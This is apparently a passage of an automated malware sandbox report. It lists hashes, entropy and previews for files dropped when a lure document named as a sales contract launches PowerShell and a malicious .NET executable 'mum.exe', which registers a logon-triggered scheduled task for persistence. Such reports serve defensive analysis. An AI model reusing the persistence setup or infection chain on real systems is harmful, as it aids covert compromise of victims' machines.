                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:gAWY3n:qY3n
                                    MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                    SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                    SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                    SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                    Malicious:false
                                    Preview:[ZoneTransfer]..ZoneId=3..
                                    Process:C:\Users\user\AppData\Roaming\mum.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1580
                                    Entropy (8bit):5.115280404917023
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtMa+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTM/v
                                    MD5:F68FD447E925A59C5FEDAD28639C03B5
                                    SHA1:18F3A8E4F4588435ABF2BD91BAF793B03036F5BA
                                    SHA-256:09F539CFBA87B19BFAFCE1EC1A5E147F96585DEE4AA5D693035917B5DE831853
                                    SHA-512:4B0ADAB4FEBB6CB8C3D2A8E61C3F13DDA4A600E8690D7BA8E4C820D8C3D34ACC1FDF848A68A94498CF55D80FEA2DAD81867A73698F389A4A2D91141983E9F93E
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    Process:C:\Users\user\AppData\Roaming\mum.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1580
                                    Entropy (8bit):5.115280404917023
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtMa+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTM/v
                                    MD5:F68FD447E925A59C5FEDAD28639C03B5
                                    SHA1:18F3A8E4F4588435ABF2BD91BAF793B03036F5BA
                                    SHA-256:09F539CFBA87B19BFAFCE1EC1A5E147F96585DEE4AA5D693035917B5DE831853
                                    SHA-512:4B0ADAB4FEBB6CB8C3D2A8E61C3F13DDA4A600E8690D7BA8E4C820D8C3D34ACC1FDF848A68A94498CF55D80FEA2DAD81867A73698F389A4A2D91141983E9F93E
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    Process:C:\Users\user\AppData\Roaming\mum.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1580
                                    Entropy (8bit):5.115280404917023
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtMa+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTM/v
                                    MD5:F68FD447E925A59C5FEDAD28639C03B5
                                    SHA1:18F3A8E4F4588435ABF2BD91BAF793B03036F5BA
                                    SHA-256:09F539CFBA87B19BFAFCE1EC1A5E147F96585DEE4AA5D693035917B5DE831853
                                    SHA-512:4B0ADAB4FEBB6CB8C3D2A8E61C3F13DDA4A600E8690D7BA8E4C820D8C3D34ACC1FDF848A68A94498CF55D80FEA2DAD81867A73698F389A4A2D91141983E9F93E
                                    Malicious:true
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:55 2022, mtime=Tue Mar 8 15:45:55 2022, atime=Tue Aug 23 19:42:13 2022, length=232189, window=hide
                                    Category:dropped
                                    Size (bytes):1144
                                    Entropy (8bit):4.585882118216553
                                    Encrypted:false
                                    SSDEEP:24:8DoOpn/XTRKJIFtbvpPeqw8HvpeDv3q/cX7cY:8DoOl/XT08bvpPZwgvpV/Kl
                                    MD5:3F0031D7152E93485A9CB97D737A3D96
                                    SHA1:1FC410B0A390021EC5CF5CD55E82E3372A9C482C
                                    SHA-256:FA0172E640E4DB5AA4467F42984343222CF1A4570B5F98FDD1AAC89A6DFFD972
                                    SHA-512:F513D775427DD9D23BE72F7F7834E0632818803A88DC34272BFBA1FCFB74AEEA89427ED98DBC23789C8E1F3B3CE0BBC8BF71A98495A66584FEB2E14733737BC9
                                    Malicious:false
                                    Preview:L..................F.... ........3.......3.../.0................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......UG. .REVISE~1.RTF..~......hT..hT..*...r.....'...............R.e.v.i.s.e.d. .s.a.l.e.s. .c.o.n.t.r.a.c.t. .f.o.r. .C.r.o.s.s.w.e.a.r...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Revised sales contract for Crosswear.rtf.?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .s.a.l.e.s. .c.o.n.t.r.a.c.t. .f.o.r. .C.r.o.s.s.w.e.a.r...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):126
                                    Entropy (8bit):4.609267586138196
                                    Encrypted:false
                                    SSDEEP:3:bDuMJlvDz3dLxLO5EXLU4omxWGD4ovDz3dLxLO5EXLU4ov:bCkHtNLY+3nkovHtNLY+3y
                                    MD5:227889345738BE30F324D24C1591BB5C
                                    SHA1:C5E1934FB7FE49AAFBE7FA868521370C995F3C48
                                    SHA-256:4E4B976A736B9828DC58E4BEC6387749465D613AAE43AC77E932BF3509E390CB
                                    SHA-512:B16994B6A6CEA942D29725EADDE2AEFE156BA5CCFFE32B757FB1A5FFE0D448CFBA2C837E8811BD16942BF91641DB788830836E249BA92DC0177C85DB9E2A7F22
                                    Malicious:false
                                    Preview:[folders]..Templates.LNK=0..Revised sales contract for Crosswear.LNK=0..[misctf]..Revised sales contract for Crosswear.LNK=0..
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.503835550707525
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                    Malicious:false
                                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846306743376974
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
                                    MD5:172117BA4DB050629809C017FA5DEE4E
                                    SHA1:0C81C74C76412E622676842C56850779172778B8
                                    SHA-256:170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
                                    SHA-512:AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846306743376974
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
                                    MD5:172117BA4DB050629809C017FA5DEE4E
                                    SHA1:0C81C74C76412E622676842C56850779172778B8
                                    SHA-256:170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
                                    SHA-512:AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846306743376974
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
                                    MD5:172117BA4DB050629809C017FA5DEE4E
                                    SHA1:0C81C74C76412E622676842C56850779172778B8
                                    SHA-256:170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
                                    SHA-512:AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.587462746416652
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
                                    MD5:07643C67B005B71C5DF2FC32619D99A6
                                    SHA1:EB3FC05187C1D26B751BCF68C786AD29F82B7204
                                    SHA-256:C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
                                    SHA-512:DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.587462746416652
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
                                    MD5:07643C67B005B71C5DF2FC32619D99A6
                                    SHA1:EB3FC05187C1D26B751BCF68C786AD29F82B7204
                                    SHA-256:C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
                                    SHA-512:DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.587462746416652
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
                                    MD5:07643C67B005B71C5DF2FC32619D99A6
                                    SHA1:EB3FC05187C1D26B751BCF68C786AD29F82B7204
                                    SHA-256:C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
                                    SHA-512:DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846306743376974
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
                                    MD5:172117BA4DB050629809C017FA5DEE4E
                                    SHA1:0C81C74C76412E622676842C56850779172778B8
                                    SHA-256:170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
                                    SHA-512:AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.587462746416652
                                    Encrypted:false
                                    SSDEEP:96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
                                    MD5:07643C67B005B71C5DF2FC32619D99A6
                                    SHA1:EB3FC05187C1D26B751BCF68C786AD29F82B7204
                                    SHA-256:C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
                                    SHA-512:DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Users\user\AppData\Roaming\mum.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):829952
                                    Entropy (8bit):7.980422003620349
                                    Encrypted:false
                                    SSDEEP:12288:Pu1znYPEX0k/g7Iw5O4OAA+sg7l+kwLnKsqH+OMcKDZrqlmakPDbYsu/tn1:GZY7ft/3HEKRHEZ6AbYNt
                                    MD5:06C16E9A1807F8754D73C6B77E978D02
                                    SHA1:A3B04691195895358512BCAE3658E2D10CDB2178
                                    SHA-256:1A87E22338388A438C836B8CF97E2C28074D3CC992879D330F68CA88B684F571
                                    SHA-512:4DA172D828B8AB4791E90D21FA422A12CBB09678780132822A6DD7D8107DE28615E3F1D2D575DC0A7243EC1E8E65E848C953ADD6B6867B045E20FAE3BB6801D9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................................. ........@.. ....................... ............@.....................................W.......\............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H...........9......S....`...&..........................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....ok...:q....(....+..(........}.........(......*................n..}.....{....,..{....oT...*..{....*.s..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):829952
                                    Entropy (8bit):7.980422003620349
                                    Encrypted:false
                                    SSDEEP:12288:Pu1znYPEX0k/g7Iw5O4OAA+sg7l+kwLnKsqH+OMcKDZrqlmakPDbYsu/tn1:GZY7ft/3HEKRHEZ6AbYNt
                                    MD5:06C16E9A1807F8754D73C6B77E978D02
                                    SHA1:A3B04691195895358512BCAE3658E2D10CDB2178
                                    SHA-256:1A87E22338388A438C836B8CF97E2C28074D3CC992879D330F68CA88B684F571
                                    SHA-512:4DA172D828B8AB4791E90D21FA422A12CBB09678780132822A6DD7D8107DE28615E3F1D2D575DC0A7243EC1E8E65E848C953ADD6B6867B045E20FAE3BB6801D9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
